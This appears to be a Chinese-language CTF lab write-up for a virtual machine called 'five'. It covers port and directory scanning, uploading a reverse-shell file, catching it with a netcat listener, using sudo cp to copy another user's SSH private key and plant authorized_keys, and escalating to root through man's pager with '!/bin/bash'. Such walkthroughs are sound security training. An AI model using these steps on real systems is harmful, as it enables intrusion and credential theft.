信息搜集
主机扫描
arp-scan -l端口扫描
┌──(root㉿kali)-[~]
└─# nmap -sV -p- 192.168.254.187
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-25 07:17 EDT
Nmap scan report for 192.168.254.187
Host is up (0.00024s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.14.2
MAC Address: 08:00:27:38:74:E0 (Oracle VirtualBox virtual NIC)
路径扫描
┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -t 100 -b 403,404 -x .php,.txt,.jpg,.html -u http://192.168.254.187
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.254.187
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,jpg,html,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/uploads (Status: 301) [Size: 185] [--> http://192.168.254.187/uploads/]
/admin (Status: 301) [Size: 185] [--> http://192.168.254.187/admin/]
/upload.html (Status: 200) [Size: 346]
/upload.php (Status: 200) [Size: 48]
/robots.txt (Status: 200) [Size: 17]
80端口
/admin
/uploads
/upload.html
上传文件shell,这里看绿老哥的博客,发现一个骚好用的反弹shell的网站,就用吧,一用一个不吱声,这里设置的ip是你攻击机的ip
Online – Reverse Shell Generator (revshells.com)
然后进行上传,但需要注意的是,因为我们进入uploads会报错,所以我们的上传路径需要改变,直接删除,默认上传到了个根目录上了。(接一下绿老哥的图,我的删了嘻嘻
获取shell
kali: nc -lnvp 1234
查看user.txt,发现权限不够,查看home目录,发现确实还有一个用户,那就提权吧
提权
- sudo -l 发现存在一个cp命令,可以利用
Matching Defaults entries for www-data on five:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on five:
(melisa) NOPASSWD: /bin/cp
我第一时间是就想的是,在/tmp,搞一个id_rsa,然后再将milesa的用户的id_rsa复制下来,然后看师傅的wp,发现确实是这样,耶耶耶,但我少了一样东西,就是需要自己生成一个公钥放在.ssh的公钥文件中,然后利用私钥登录,这样就可以不用密码登录,使用自己的秘钥登录,之前碰到过这个用法,然后登陆成功
cd /tmp /tmp
touch id_rsa
sudo -u melisa cp /home/melisa/.ssh/id_rsa /tmp/id_rsa
chmod 600 id_rsa
ssh-keygen -y -f id_rsa > authorized_keys
sudo -u melisa cp /tmp/authorized_keys /home/melisa/.ssh/authorized_keys
ssh -i id_rsa melisa@localhost -p 4444我们发现22端口并没还有开启,所以我们需要4444端口连接ssh
成功切换至melisa
sudo -l
Matching Defaults entries for melisa on five:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User melisa may run the following commands on five:
(ALL) SETENV: NOPASSWD: /bin/pwd, /bin/arch, /bin/man, /bin/id, /bin/rm,
/bin/clear利用man提权,但使用起来发现报错
sudo man man
Your terminal lacks the ability to clear the screen or position the cursor.
根据师傅的提示,发现需要分页执行,第一次听说这个
melisa@five:~$ sudo /bin/man -P /usr/bin/less man
sudo /bin/man -P /usr/bin/less man
WARNING: terminal is not fully functional
- (press RETURN)!/bin/bash
!//bbiinn//bbaasshh!/bin/bash
root@five:/home/melisa# cd /root
cd /root
root@five:~# ls
ls
root.txt
root@five:~# cat root.txt
cat root.txt
WTFGivemefive
知识点
- 使用公钥私钥登录
- man命令的分页使用
- 逆向shell的文件上传